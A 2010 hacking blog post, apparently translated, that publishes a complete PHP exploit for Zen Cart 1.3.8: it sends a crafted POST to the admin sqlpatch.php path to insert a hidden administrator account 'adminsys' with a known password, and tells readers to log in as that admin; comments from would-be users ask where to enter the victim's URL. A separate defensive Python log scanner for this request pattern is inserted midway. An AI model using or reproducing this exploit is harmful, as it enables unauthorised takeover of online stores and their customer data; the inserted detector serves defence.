29 June 2010

Zen Cart SQL Execution Exploit php

It's been a long time since I updated the blog...
Lately a lot of kids have been looking for Zen Cart targets.
For fun, I tried porting zen.py, the Python-based script on milw0rm, to PHP.

Run the PHP script below; if the result is Done,
try logging in to the admin with

username : adminsys
password : wew


Here is the script:
http://noscan.xp3.biz/zen.txt

#!/usr/bin/php

if($argc < 2)
{
echo "
==============================================
Zen Cart 1.3.8 Remote SQL Execution Exploit
==============================================


root@irvian ~# php zen.php http://target.com
==============================================
";exit(1);
}

function gets($url,$post=null) {
$hajar = curl_init();
curl_setopt($hajar,CURLOPT_URL, $url);
curl_setopt($hajar, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($hajar, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($hajar, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);

curl_setopt ($hajar, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($hajar, CURLOPT_TIMEOUT, 0);

if($post != null)
{
curl_setopt ($hajar, CURLOPT_POST, true);
curl_setopt ($hajar, CURLOPT_POSTFIELDS,$post);
}

$result = curl_exec($hajar);
curl_close($hajar);
return $result;
}

$url = $argv[1];

$sql = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (56, 'adminsys', 'admin@irvian.info', '617ec22fbb8f201c366e9848c0eb6925:87');
";
$enc = urlencode($sql);
$form = $url."/admin/sqlpatch.php/password_forgotten.php?action=execute";

$req = gets($form,"query_string=$enc");

if(preg_match("/1 statements processed/i", $req)){
echo "\n[!]Done";
}
else{
echo "\n[!]failed";}
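
A defender-side check for the request shape the script above sends, as an added example that is not part of the original post: it scans web access logs for paths that place password_forgotten.php (or any second .php name) after another .php script as trailing path info. The combined log format, the function name scan and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/nginx "combined" access-log line (assumed log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# A .php script followed by trailing path info that names a second .php file.
# The admin directory name is not fixed here, since sites can rename it.
NESTED_PHP = re.compile(r'/(?P<script>[^/]+\.php)/(?P<extra>[^/]+\.php)$', re.I)

def scan(lines):
    """Return one finding per request whose path nests one .php under another."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        parts = urlsplit(m["target"])
        nested = NESTED_PHP.search(unquote(parts.path))
        if not nested:
            continue
        action = parse_qs(parts.query).get("action", [""])[0]
        # Exact shape used by the script above: POST to sqlpatch.php, action=execute.
        exact = (nested["script"].lower() == "sqlpatch.php"
                 and m["method"] == "POST" and action == "execute")
        findings.append({
            "ip": m["ip"], "time": m["ts"], "path": parts.path,
            "status": int(m["status"]),
            "severity": "high" if exact and m["status"] == "200" else "review",
        })
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [29/Jun/2010:10:01:02 +0000] "GET /index.php?main_page=index HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [29/Jun/2010:10:03:44 +0000] "POST /admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1" 200 2310 "-" "-"',
    '203.0.113.9 - - [29/Jun/2010:10:03:50 +0000] "GET /admin/login.php HTTP/1.1" 200 1800 "-" "Mozilla/5.0"',
    '192.0.2.55 - - [29/Jun/2010:11:15:09 +0000] "GET /shopadmin/example.php/password_forgotten.php HTTP/1.1" 302 0 "-" "-"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f["severity"], f["ip"], f["time"], f["path"], f["status"])
```

A high finding is a reason to audit the admin table for accounts nobody created, such as the adminsys name the post uses.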



9 comments:

letjen said...

hmmm bash plz master irvian

[v] said...

that's more like it, active again, don't just stress out because England got thrashed by little kids :))

fekkeh said...

mwah ....

rajakoya said...

so stingy, won't share...

rajakoya said...

I'm confused about how to do it... can that be explained in more detail??

Anonymous said...

hehehe..
looks like the script is missing something, bro..
missing

irvian said...

The tool has been tested properly; it was already explained above that this is a PHP tool, so don't forget to add the php characters at the beginning and end.
http://noscan.xp3.biz/zen.txt

kacung said...

where do you enter the victim's URL, bro?

rajakoya said...

why does it keep saying php not found???
